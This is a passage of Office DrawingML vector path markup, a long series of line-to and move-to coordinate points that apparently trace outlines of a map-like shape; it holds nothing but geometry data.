                  <a:pt x="18486" y="1396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18398" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18231" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18252" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18346" y="1498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18320" y="1540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18165" y="1437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18092" y="1447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17993" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17916" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17875" y="1447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17797" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17739" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17668" y="1283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17569" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17409" y="1283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17232" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17149" y="1139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16714" y="1065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="1117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16796" y="1219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16714" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16702" y="1232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16599" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16547" y="1232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16450" y="1181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16481" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16382" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16273" y="1158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16268" y="1107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="1036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16097" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16029" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15932" y="953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15983" y="1036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15796" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15755" y="963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15609" y="943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15553" y="963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15553" y="995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15491" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15465" y="943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15387" y="911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15324" y="902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15336" y="873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15407" y="809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15433" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15407" y="728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15350" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15225" y="635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15107" y="635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15086" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15044" y="603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14957" y="594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14992" y="574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14905" y="542"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6975" y="584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6933" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6959" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7037" y="667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7053" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7032" y="770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7018" y="821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7167" y="873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7251" y="873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7380" y="850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7426" y="873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7499" y="841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7536" y="821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7546" y="770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7520" y="738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7458" y="728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7369" y="738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7296" y="757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7239" y="748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7188" y="748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7178" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7141" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7173" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7157" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7079" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7053" y="594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6975" y="584"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13505" y="603"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13433" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13381" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13251" y="677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13143" y="748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13070" y="799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13096" y="850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13023" y="943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13065" y="953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13008" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13029" y="1107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12987" y="1129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13013" y="1190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13096" y="1219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13122" y="1271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13267" y="1283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13288" y="1271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13178" y="1190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13148" y="1097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13185" y="985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13216" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13308" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13412" y="728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13536" y="677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13552" y="645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13505" y="603"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6441" y="626"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6379" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6375" y="757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6307" y="748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6276" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6188" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6130" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007" y="789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6047" y="799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6245" y="789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6130" y="841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6111" y="873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6177" y="873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6307" y="821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6457" y="809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6535" y="706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6447" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6457" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6473" y="635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6441" y="626"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6877" y="626"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6867" y="645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6815" y="635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6732" y="677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6690" y="667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6643" y="748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6716" y="738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681" y="799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6716" y="821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6789" y="809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6851" y="728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6881" y="677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="626"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16377" y="687"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16340" y="706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16377" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16511" y="850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16558" y="821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16714" y="831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16683" y="748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16490" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16377" y="687"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6959" y="738"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6888" y="770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6841" y="821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6877" y="841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6928" y="850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6975" y="809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6975" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6959" y="738"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16740" y="757"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16754" y="789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16869" y="831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16942" y="841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16827" y="770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16740" y="757"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5793" y="873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5644" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5644" y="953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5560" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5468" y="1107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5430" y="1149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5494" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5489" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5633" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664" y="1149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762" y="1078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5913" y="995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5981" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5939" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5840" y="892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5793" y="873"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6893" y="902"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6836" y="934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6789" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6763" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6742" y="1129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6789" y="1129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6872" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6933" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7043" y="934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6975" y="902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6893" y="902"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6634" y="934"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6556" y="985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6566" y="1056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6488" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467" y="1078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6530" y="1158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6540" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6664" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6721" y="1078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6747" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6752" y="943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6669" y="953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6634" y="934"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7235" y="934"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7115" y="963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7048" y="1004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6975" y="1107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6940" y="1219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6996" y="1219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6933" y="1271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6950" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7018" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7095" y="1364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7244" y="1386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7328" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7364" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7385" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7421" y="1386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7442" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7406" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7477" y="1527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7529" y="1579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7536" y="1620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7529" y="1672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7437" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7406" y="1848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7406" y="1887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7307" y="1899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7218" y="1909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162" y="1989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7188" y="2031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7328" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7338" y="1980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7390" y="2041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7437" y="2105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7411" y="2134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7452" y="2195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7536" y="2268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7649" y="2320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7654" y="2268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7623" y="2195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7588" y="2092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7680" y="2185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7727" y="2227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7769" y="2134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7769" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7758" y="1980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7711" y="1928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7680" y="1858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7706" y="1797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7769" y="1774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="1887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7852" y="1938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7970" y="1806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8007" y="1723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7934" y="1713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7899" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7835" y="1579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7753" y="1508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7852" y="1447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7840" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7821" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7727" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7711" y="1181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7618" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7633" y="1158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7592" y="1107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7520" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7463" y="1097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7369" y="1129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7400" y="1056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7380" y="943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7251" y="985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7178" y="1078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7173" y="1004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7235" y="934"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16698" y="934"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16657" y="943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16646" y="985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16749" y="1004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16817" y="1004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16787" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16698" y="934"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7437" y="943"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7416" y="985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7442" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7452" y="1056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7503" y="1036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7546" y="1036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7592" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7597" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7550" y="953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7458" y="943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7437" y="943"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6358" y="953"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6337" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6358" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6436" y="975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6415" y="953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6358" y="953"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5981" y="985"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5830" y="1056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5774" y="1097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5689" y="1181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5748" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5814" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5689" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5689" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5851" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5918" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5851" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5793" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5715" y="1354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5680" y="1364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5685" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5732" y="1437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5779" y="1466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5774" y="1527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5835" y="1518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975" y="1498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6078" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6193" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6266" y="1498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6302" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6292" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6396" y="1354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6344" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6297" y="1242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6323" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6354" y="1056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6332" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6297" y="995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6255" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6224" y="1129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6177" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6198" y="1065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6182" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6104" y="1088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6073" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5960" y="1065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6012" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5981" y="985"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6747" y="1139"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6655" y="1219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6596" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6629" y="1396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6643" y="1466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="1579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6540" y="1579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6478" y="1672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6519" y="1559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467" y="1518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6422" y="1540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6396" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6332" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6255" y="1630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6198" y="1579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6146" y="1591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6125" y="1518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6104" y="1498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6064" y="1508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007" y="1508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5960" y="1550"/>
                </a:lnTo>
                <a:lnTo>
